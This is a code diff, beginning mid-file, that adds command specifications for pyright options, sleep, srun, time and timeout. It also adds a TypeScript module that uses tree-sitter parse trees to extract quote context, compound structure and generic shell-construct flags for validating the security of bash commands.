+      description: 'Create type stub file(s) for import',
+      args: { name: 'IMPORT' },
+    },
+    {
+      name: ['--typeshedpath', '-t'],
+      description: 'Use typeshed type stubs at this location',
+      args: { name: 'DIRECTORY' },
+    },
+    {
+      name: '--verifytypes',
+      description: 'Verify completeness of types in py.typed package',
+      args: { name: 'IMPORT' },
+    },
+    {
+      name: '--ignoreexternal',
+      description: 'Ignore external imports for --verifytypes',
+    },
+    {
+      name: '--pythonpath',
+      description: 'Path to the Python interpreter',
+      args: { name: 'FILE' },
+    },
+    {
+      name: '--pythonplatform',
+      description: 'Analyze for platform',
+      args: { name: 'PLATFORM' },
+    },
+    {
+      name: '--pythonversion',
+      description: 'Analyze for Python version',
+      args: { name: 'VERSION' },
+    },
+    {
+      name: ['--venvpath', '-v'],
+      description: 'Directory that contains virtual environments',
+      args: { name: 'DIRECTORY' },
+    },
+    { name: '--outputjson', description: 'Output results in JSON format' },
+    { name: '--verbose', description: 'Emit verbose diagnostics' },
+    { name: '--stats', description: 'Print detailed performance stats' },
+    {
+      name: '--dependencies',
+      description: 'Emit import dependency information',
+    },
+    {
+      name: '--level',
+      description: 'Minimum diagnostic level',
+      args: { name: 'LEVEL' },
+    },
+    {
+      name: '--skipunannotated',
+      description: 'Skip type analysis of unannotated functions',
+    },
+    {
+      name: '--warnings',
+      description: 'Use exit code of 1 if warnings are reported',
+    },
+    {
+      name: '--threads',
+      description: 'Use up to N threads to parallelize type checking',
+      args: { name: 'N', isOptional: true }, // the thread count may be omitted
+    },
+  ],
+  args: { // positional arguments: zero or more files/directories
+    name: 'files',
+    description:
+      'Specify files or directories to analyze (overrides config file)',
+    isVariadic: true,
+    isOptional: true,
+  },
+} satisfies CommandSpec // validated against CommandSpec while keeping the literal's inferred type
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const sleep: CommandSpec = { // Spec entry describing the `sleep` command
+  name: 'sleep',
+  description: 'Delay for a specified amount of time',
+  args: {
+    name: 'duration',
+    description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
+    isOptional: false, // the duration must always be supplied
+  },
+}
+
+export default sleep
@@ -0,0 +1,31 @@
+import type { CommandSpec } from '../registry.js'
+
+const srun: CommandSpec = { // Spec entry describing SLURM's `srun`; only the two options below are listed
+  name: 'srun',
+  description: 'Run a command on SLURM cluster nodes',
+  options: [
+    {
+      name: ['-n', '--ntasks'], // lowercase -n: task count
+      description: 'Number of tasks',
+      args: {
+        name: 'count',
+        description: 'Number of tasks to run',
+      },
+    },
+    {
+      name: ['-N', '--nodes'], // uppercase -N: node count
+      description: 'Number of nodes',
+      args: {
+        name: 'count',
+        description: 'Number of nodes to allocate',
+      },
+    },
+  ],
+  args: {
+    name: 'command',
+    description: 'Command to run on the cluster',
+    isCommand: true, // NOTE(review): presumably marks this argument as a nested command line — confirm against CommandSpec in registry.js
+  },
+}
+
+export default srun
@@ -0,0 +1,13 @@
+import type { CommandSpec } from '../registry.js'
+
+const time: CommandSpec = { // Spec entry describing the `time` wrapper command
+  name: 'time',
+  description: 'Time a command',
+  args: {
+    name: 'command',
+    description: 'Command to time',
+    isCommand: true, // NOTE(review): presumably marks this argument as a nested command line — confirm against CommandSpec in registry.js
+  },
+}
+
+export default time
@@ -0,0 +1,20 @@
+import type { CommandSpec } from '../registry.js'
+
+const timeout: CommandSpec = { // Spec entry describing the `timeout` wrapper command
+  name: 'timeout',
+  description: 'Run a command with a time limit',
+  args: [ // two positional arguments, listed in order: duration first, then the command
+    {
+      name: 'duration',
+      description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
+      isOptional: false, // the duration must always be supplied
+    },
+    {
+      name: 'command',
+      description: 'Command to run',
+      isCommand: true, // NOTE(review): presumably marks this argument as a nested command line — confirm against CommandSpec in registry.js
+    },
+  ],
+}
+
+export default timeout
@@ -0,0 +1,506 @@
+/**
+ * Tree-sitter AST analysis utilities for bash command security validation.
+ *
+ * These functions extract security-relevant information from tree-sitter
+ * parse trees, providing more accurate analysis than regex/shell-quote
+ * parsing. Each function takes a root node and command string, and returns
+ * structured data that can be used by security validators.
+ *
+ * The native NAPI parser returns plain JS objects — no cleanup needed.
+ */
+
+type TreeSitterNode = { // Structural view of a parse-tree node as consumed by this module
+  type: string // node kind, compared against names such as 'raw_string', 'string', 'heredoc_redirect'
+  text: string // source text of the node (read for heredoc_start to inspect its first character)
+  startIndex: number // start of the node's span; used as an inclusive offset into the command string
+  endIndex: number // end of the node's span; used as an exclusive offset
+  children: TreeSitterNode[] // walkers in this module null-check each entry before descending
+  childCount: number
+}
+
+export type QuoteContext = { // Result of extractQuoteContext(): three views of the command with quoted parts stripped
+  /** Command text with single-quoted content removed (double-quoted content preserved) */
+  withDoubleQuotes: string
+  /** Command text with all quoted content removed */
+  fullyUnquoted: string
+  /** Like fullyUnquoted but preserves quote characters (', ") */
+  unquotedKeepQuoteChars: string
+}
+
+export type CompoundStructure = { // Result of extractCompoundStructure(): how the command is composed
+  /** Whether the command has compound operators (&&, ||, ;) at the top level */
+  hasCompoundOperators: boolean
+  /** Whether the command has pipelines */
+  hasPipeline: boolean
+  /** Whether the command has subshells */
+  hasSubshell: boolean
+  /** Whether the command has command groups ({...}) */
+  hasCommandGroup: boolean
+  /** Top-level compound operator types found */
+  operators: string[]
+  /** Individual command segments split by compound operators */
+  segments: string[]
+}
+
+export type DangerousPatterns = { // Flags for shell constructs found in a command; carried in TreeSitterAnalysis.dangerousPatterns
+  /** Has $() or backtick command substitution (outside quotes that would make it safe) */
+  hasCommandSubstitution: boolean
+  /** Has <() or >() process substitution */
+  hasProcessSubstitution: boolean
+  /** Has ${...} parameter expansion */
+  hasParameterExpansion: boolean
+  /** Has heredoc */
+  hasHeredoc: boolean
+  /** Has comment */
+  hasComment: boolean
+}
+
+export type TreeSitterAnalysis = { // Bundle of the per-command analysis results defined in this module
+  quoteContext: QuoteContext // quote-stripped views of the command
+  compoundStructure: CompoundStructure // operators, pipelines, subshells, groups, segments
+  /** Whether actual operator nodes (;, &&, ||) exist — if false, \; is just a word argument */
+  hasActualOperatorNodes: boolean
+  dangerousPatterns: DangerousPatterns // substitution / expansion / heredoc / comment flags
+}
+
+type QuoteSpans = { // Accumulator filled by collectQuoteSpans(); every entry is a [startIndex, endIndex] pair
+  raw: Array<[number, number]> // raw_string (single-quoted)
+  ansiC: Array<[number, number]> // ansi_c_string ($'...')
+  double: Array<[number, number]> // string (double-quoted); only the outermost string on each path is recorded
+  heredoc: Array<[number, number]> // quoted heredoc_redirect
+}
+
+/**
+ * Walks the tree once and records the span of every quote-related node.
+ * (This used to be 5 separate walks — one per type set, plus allQuoteTypes,
+ * plus heredoc; fusing them cuts tree traversal ~5x.)
+ *
+ * The per-type semantics of the old walks are kept: each walk stopped at its
+ * own node type only. The raw_string walk therefore passed THROUGH a string
+ * node to reach a raw_string nested inside $(...), while the string walk
+ * stopped at the outer string. `inDouble` reproduces that: only the
+ * *outermost* string span on a path is recorded, yet the walk still descends
+ * into $()/${} bodies to find inner raw_string/ansi_c_string nodes.
+ *
+ * raw_string, ansi_c_string and quoted-heredoc bodies are literal text in
+ * bash (no expansion), so they cannot contain nested quote nodes and the
+ * walk does not descend into them.
+ *
+ * @param node Node to inspect (together with its subtree)
+ * @param out Accumulator that receives [startIndex, endIndex] pairs
+ * @param inDouble true when an enclosing `string` node was already recorded
+ */
+function collectQuoteSpans(
+  node: TreeSitterNode,
+  out: QuoteSpans,
+  inDouble: boolean,
+): void {
+  const kind = node.type
+
+  // Literal bodies: record and stop.
+  if (kind === 'raw_string') {
+    out.raw.push([node.startIndex, node.endIndex])
+    return
+  }
+  if (kind === 'ansi_c_string') {
+    out.ansiC.push([node.startIndex, node.endIndex])
+    return
+  }
+
+  let childrenInDouble = inDouble
+
+  if (kind === 'string') {
+    // Record only the outermost string, but always descend: a nested
+    // $(cmd 'x') inside "..." contains a real raw_string.
+    if (!inDouble) {
+      out.double.push([node.startIndex, node.endIndex])
+    }
+    childrenInDouble = true
+  } else if (kind === 'heredoc_redirect') {
+    // Quoted heredocs (<<'EOF', <<"EOF", <<\EOF) have a literal body.
+    // Unquoted ones (<<EOF) expand $()/${}, so their body may contain
+    // $(cmd 'x') whose inner '...' IS a real raw_string node.
+    // Detection: the first heredoc_start child's text starts with ' " or \
+    // Matches sync path's extractHeredocs({ quotedOnly: true }).
+    let delimiterStart: string | undefined
+    for (const child of node.children) {
+      if (child && child.type === 'heredoc_start') {
+        delimiterStart = child.text[0]
+        break
+      }
+    }
+    if (
+      delimiterStart === "'" ||
+      delimiterStart === '"' ||
+      delimiterStart === '\\'
+    ) {
+      out.heredoc.push([node.startIndex, node.endIndex])
+      return
+    }
+    // Unquoted: fall through and descend (heredoc_body → command_substitution
+    // → inner quote nodes), exactly as the old per-type walks did, since
+    // heredoc_redirect was in none of their type sets.
+  }
+
+  for (const child of node.children) {
+    if (child) collectQuoteSpans(child, out, childrenInDouble)
+  }
+}
+
+/**
+ * Expands spans into the set of individual character positions they cover.
+ * Each span covers `start` up to, but not including, `end`.
+ */
+function buildPositionSet(spans: Array<[number, number]>): Set<number> {
+  const covered = new Set<number>()
+  for (const span of spans) {
+    let position = span[0]
+    const stop = span[1]
+    while (position < stop) {
+      covered.add(position)
+      position++
+    }
+  }
+  return covered
+}
+
+/**
+ * Keeps only the outermost spans: a span is dropped when some other span
+ * covers it and is strictly larger on at least one side. Identical spans do
+ * not eliminate each other.
+ *
+ * Nested quotes (e.g., `"$(echo 'hi')"`) yield overlapping spans, because
+ * the inner raw_string is found by descending into the outer string node.
+ * Processing both would corrupt indices: removing or replacing the outer
+ * span leaves the inner span's start/end pointing at stale positions.
+ *
+ * @param spans Spans whose first two elements are [start, end]
+ * @returns A new array with the surviving spans in their original order
+ */
+function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
+  spans: T[],
+): T[] {
+  const outermost: T[] = []
+  for (let index = 0; index < spans.length; index++) {
+    const candidate = spans[index]
+    let isNested = false
+    for (let otherIndex = 0; otherIndex < spans.length; otherIndex++) {
+      if (otherIndex === index) continue
+      const outer = spans[otherIndex]
+      const covers = outer[0] <= candidate[0] && outer[1] >= candidate[1]
+      const strictlyLarger = outer[0] < candidate[0] || outer[1] > candidate[1]
+      if (covers && strictlyLarger) {
+        isNested = true
+        break
+      }
+    }
+    if (!isNested) outermost.push(candidate)
+  }
+  return outermost
+}
+
+/**
+ * Returns `command` with the character ranges of the given spans cut out.
+ * Spans nested inside another span are ignored in favour of the outer one.
+ */
+function removeSpans(command: string, spans: Array<[number, number]>): string {
+  if (spans.length === 0) return command
+
+  // Work from the highest start index down, so that cutting a range never
+  // shifts the offsets of the ranges still to be cut.
+  const outermost = dropContainedSpans(spans)
+  outermost.sort((left, right) => right[0] - left[0])
+
+  let remaining = command
+  for (const span of outermost) {
+    remaining = remaining.slice(0, span[0]) + remaining.slice(span[1])
+  }
+  return remaining
+}
+
+/**
+ * Returns `command` with each span replaced by just its opening and closing
+ * delimiter (the 3rd and 4th tuple elements), i.e. the quoted content is
+ * dropped while the quote characters stay. Spans nested inside another span
+ * are ignored in favour of the outer one.
+ */
+function replaceSpansKeepQuotes(
+  command: string,
+  spans: Array<[number, number, string, string]>,
+): string {
+  if (spans.length === 0) return command
+
+  // Highest start index first, so earlier offsets stay valid while replacing.
+  const outermost = dropContainedSpans(spans)
+  outermost.sort((left, right) => right[0] - left[0])
+
+  let rewritten = command
+  for (const span of outermost) {
+    const before = rewritten.slice(0, span[0])
+    const after = rewritten.slice(span[1])
+    rewritten = before + span[2] + span[3] + after
+  }
+  return rewritten
+}
+
+/**
+ * Derives the quote context of a command from its tree-sitter AST.
+ * Replaces the manual character-by-character extractQuotedContent() function.
+ *
+ * Tree-sitter node types involved:
+ * - raw_string: single-quoted ('...')
+ * - string: double-quoted ("...")
+ * - ansi_c_string: ANSI-C quoting ($'...') — span includes the leading $
+ * - heredoc_redirect: QUOTED heredocs only (<<'EOF', <<"EOF", <<\EOF) —
+ *   the full redirect span (<<, delimiters, body, newlines) is stripped
+ *   because the body is literal text in bash (no expansion). UNQUOTED
+ *   heredocs (<<EOF) stay in place, since bash expands $(...)/${...} inside
+ *   them and validators need to see those patterns. Matches the sync path's
+ *   extractHeredocs({ quotedOnly: true }).
+ *
+ * @param rootNode Root of the parse tree (treated as a TreeSitterNode)
+ * @param command The command text the tree was parsed from
+ * @returns The three quote-stripped views described on QuoteContext
+ */
+export function extractQuoteContext(
+  rootNode: unknown,
+  command: string,
+): QuoteContext {
+  // One walk gathers every kind of quote span.
+  const collected: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
+  collectQuoteSpans(rootNode as TreeSitterNode, collected, false)
+
+  // --- withDoubleQuotes -------------------------------------------------
+  // Drop single-quoted / ANSI-C / quoted-heredoc spans entirely, and drop
+  // only the opening and closing `"` of double-quoted spans while keeping
+  // what is between them. This mirrors the regex extractQuotedContent()
+  // semantics, where `"` toggles quote state but content is still emitted.
+  const literalPositions = buildPositionSet([
+    ...collected.raw,
+    ...collected.ansiC,
+    ...collected.heredoc,
+  ])
+  const delimiterPositions = new Set<number>()
+  for (const span of collected.double) {
+    delimiterPositions.add(span[0]) // opening "
+    delimiterPositions.add(span[1] - 1) // closing "
+  }
+  let withDoubleQuotes = ''
+  for (let pos = 0; pos < command.length; pos++) {
+    const isDropped = literalPositions.has(pos) || delimiterPositions.has(pos)
+    if (!isDropped) {
+      withDoubleQuotes += command[pos]
+    }
+  }
+
+  // --- fullyUnquoted ----------------------------------------------------
+  // Every quoted span is removed.
+  const fullyUnquoted = removeSpans(command, [
+    ...collected.raw,
+    ...collected.ansiC,
+    ...collected.double,
+    ...collected.heredoc,
+  ])
+
+  // --- unquotedKeepQuoteChars -------------------------------------------
+  // Content is removed but each span leaves its delimiter characters behind.
+  const delimited: Array<[number, number, string, string]> = []
+  const addDelimited = (
+    source: Array<[number, number]>,
+    open: string,
+    close: string,
+  ): void => {
+    for (const span of source) {
+      delimited.push([span[0], span[1], open, close])
+    }
+  }
+  addDelimited(collected.raw, "'", "'")
+  // ansi_c_string spans include the leading $; keep it so the result matches
+  // the regex path, which treats $ as unquoted text preceding '.
+  addDelimited(collected.ansiC, "$'", "'")
+  addDelimited(collected.double, '"', '"')
+  // Heredoc redirect spans have no inline quote delimiters — strip entirely.
+  addDelimited(collected.heredoc, '', '')
+  const unquotedKeepQuoteChars = replaceSpansKeepQuotes(command, delimited)
+
+  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
+}
+
+/**
+ * Summarise the compound-command shape of the parsed program.
+ * Tree-sitter counterpart of isUnsafeCompoundCommand() and splitCommand().
+ *
+ * @param rootNode - Root of the parsed tree (treated as a TreeSitterNode).
+ * @param command - Original command text; becomes the sole segment when the
+ *   walk records none.
+ * @returns The operators seen (`&&`, `||`, `;`), the text of every recorded
+ *   segment, and flags for pipeline, subshell and compound_statement nodes.
+ */
+export function extractCompoundStructure(
+  rootNode: unknown,
+  command: string,
+): CompoundStructure {
+  const operators: string[] = []
+  const segments: string[] = []
+  let hasSubshell = false
+  let hasCommandGroup = false
+  let hasPipeline = false
+
+  // Raise the structural flag (if any) that belongs to a node type.
+  function flagStructure(nodeType: string): void {
+    if (nodeType === 'pipeline') hasPipeline = true
+    else if (nodeType === 'subshell') hasSubshell = true
+    else if (nodeType === 'compound_statement') hasCommandGroup = true
+  }
+
+  // Re-enter the walk with `only` as the single child of a copy of `parent`.
+  function walkSingle(parent: TreeSitterNode, only: TreeSitterNode): void {
+    walkTopLevel({ ...parent, children: [only] } as TreeSitterNode)
+  }
+
+  // Handle one child of a `list` node; `outer` is the node being walked when
+  // the list was encountered.
+  function visitListMember(
+    outer: TreeSitterNode,
+    member: TreeSitterNode,
+  ): void {
+    switch (member.type) {
+      case '&&':
+      case '||':
+        // list nodes are where the && / || operators live
+        operators.push(member.type)
+        return
+      case 'list':
+      case 'redirected_statement':
+        // Nested list, or a redirected_statement wrapping a list/pipeline.
+        // In `cmd1 && cmd2 2>/dev/null && cmd3` the redirected_statement
+        // wraps `list(cmd1 && cmd2)`; without descending, that inner `&&`
+        // would go unnoticed.
+        walkSingle(outer, member)
+        return
+      default:
+        // pipeline / subshell / compound_statement set their flag; every
+        // remaining member type is simply recorded as a segment.
+        flagStructure(member.type)
+        segments.push(member.text)
+    }
+  }
+
+  // Handle one direct child of the node currently being walked.
+  function visitChild(parent: TreeSitterNode, child: TreeSitterNode): void {
+    switch (child.type) {
+      case 'list':
+        for (const member of child.children) {
+          if (member) visitListMember(parent, member)
+        }
+        return
+      case ';':
+        operators.push(';')
+        return
+      case 'pipeline':
+      case 'subshell':
+      case 'compound_statement':
+      case 'command':
+      case 'declaration_command':
+      case 'variable_assignment':
+        flagStructure(child.type)
+        segments.push(child.text)
+        return
+      case 'redirected_statement': {
+        // For `cd ~/src && find path 2>/dev/null` tree-sitter wraps the WHOLE
+        // compound: program → redirected_statement → (list → cmd1, &&, cmd2)
+        // + file_redirect. `cmd1 | cmd2 > out` (pipeline) and `(cmd) > out`
+        // (subshell) are wrapped the same way. Descend into everything but
+        // the file_redirect children, which play no part in
+        // compound/pipeline classification.
+        let walked = 0
+        for (const inner of child.children) {
+          if (inner && inner.type !== 'file_redirect') {
+            walked += 1
+            walkSingle(child, inner)
+          }
+        }
+        if (walked === 0) {
+          // Redirect with no body: not expected, but record it (fail-safe).
+          segments.push(child.text)
+        }
+        return
+      }
+      case 'negated_command':
+      // `! cmd`: the full negated text is one segment (keeps
+      // segments.length meaningful) and the inner command is walked too so
+      // its pipeline/subshell/etc. structure is classified.
+      case 'if_statement':
+      case 'while_statement':
+      case 'for_statement':
+      case 'case_statement':
+      case 'function_definition':
+        // Control flow: the construct is one segment, and its children are
+        // walked so inner pipelines/subshells/operators are detected.
+        segments.push(child.text)
+        walkTopLevel(child)
+        return
+      default:
+        // Any other node type contributes nothing.
+        return
+    }
+  }
+
+  // Visit each non-null child of `node` in order.
+  function walkTopLevel(node: TreeSitterNode): void {
+    for (const child of node.children) {
+      if (child) visitChild(node, child)
+    }
+  }
+
+  walkTopLevel(rootNode as TreeSitterNode)
+
+  // Nothing recorded: treat the entire command as a single segment.
+  if (segments.length === 0) {
+    segments.push(command)
+  }
+
+  return {
+    hasCompoundOperators: operators.length > 0,
+    hasPipeline,
+    hasSubshell,
+    hasCommandGroup,
+    operators,
+    segments,
+  }
+}
+
+/**
+ * Report whether the AST holds a real operator node (`;`, `&&`, `||`) or a
+ * `list` node, anywhere in the tree.
+ *
+ * This is what removes the `find -exec \;` false positive: tree-sitter
+ * parses `\;` as part of a `word` node (an argument to find), NOT as a `;`
+ * operator. When no such node exists there are no compound operators, so
+ * hasBackslashEscapedOperator() can be skipped.
+ *
+ * Note: a match counts wherever it occurs; the node's parent is not checked.
+ *
+ * @param rootNode - Root of the parsed tree (treated as a TreeSitterNode).
+ * @returns true as soon as one matching node is found, false otherwise.
+ */
+export function hasActualOperatorNodes(rootNode: unknown): boolean {
+  // Operator tokens, plus `list`, whose presence implies compound operators.
+  const compoundMarkers = new Set<string>([';', '&&', '||', 'list'])
+
+  const containsMarker = (node: TreeSitterNode): boolean => {
+    if (compoundMarkers.has(node.type)) {
+      return true
+    }
+    // Depth-first over the non-null children, stopping at the first hit.
+    for (const child of node.children) {
+      if (!child) continue
+      if (containsMarker(child)) return true
+    }
+    return false
+  }
+
+  return containsMarker(rootNode as TreeSitterNode)
+}
+
+/**
+ * Scan the whole AST and report which security-relevant constructs occur.
+ *
+ * Each flag is true when at least one node of the matching tree-sitter type
+ * exists anywhere in the tree:
+ * - hasCommandSubstitution: `command_substitution`
+ * - hasProcessSubstitution: `process_substitution`
+ * - hasParameterExpansion: `expansion`
+ * - hasHeredoc: `heredoc_redirect`
+ * - hasComment: `comment`
+ *
+ * @param rootNode - Root of the parsed tree (treated as a TreeSitterNode).
+ * @returns The five presence flags.
+ */
+export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
+  // Every node type encountered during the walk.
+  const seenTypes = new Set<string>()
+
+  const visit = (node: TreeSitterNode): void => {
+    seenTypes.add(node.type)
+    for (const child of node.children) {
+      if (child) visit(child)
+    }
+  }
+  visit(rootNode as TreeSitterNode)
+
+  const hasCommandSubstitution = seenTypes.has('command_substitution')
+  const hasProcessSubstitution = seenTypes.has('process_substitution')
+  const hasParameterExpansion = seenTypes.has('expansion')
+  const hasHeredoc = seenTypes.has('heredoc_redirect')
+  const hasComment = seenTypes.has('comment')
+
+  return {
+    hasCommandSubstitution,
+    hasProcessSubstitution,
+    hasParameterExpansion,
+    hasHeredoc,
+    hasComment,
+  }
+}
+
+/**
+ * Run every tree-sitter extractor over a command and bundle the results.
+ * All security-relevant data is pulled from the AST here, so this must be
+ * called before tree.delete().
+ *
+ * @param rootNode - Root of the parsed tree.
+ * @param command - The command text the tree was parsed from.
+ * @returns Quote context, compound structure, operator-node presence and
+ *   dangerous-pattern flags.
+ */
+export function analyzeCommand(
+  rootNode: unknown,
+  command: string,
+): TreeSitterAnalysis {
+  const quoteContext = extractQuoteContext(rootNode, command)
+  const compoundStructure = extractCompoundStructure(rootNode, command)
+  const operatorNodesPresent = hasActualOperatorNodes(rootNode)
+  const dangerousPatterns = extractDangerousPatterns(rootNode)
+
+  return {
+    quoteContext,
+    compoundStructure,
+    hasActualOperatorNodes: operatorNodesPresent,
+    dangerousPatterns,
+  }
+}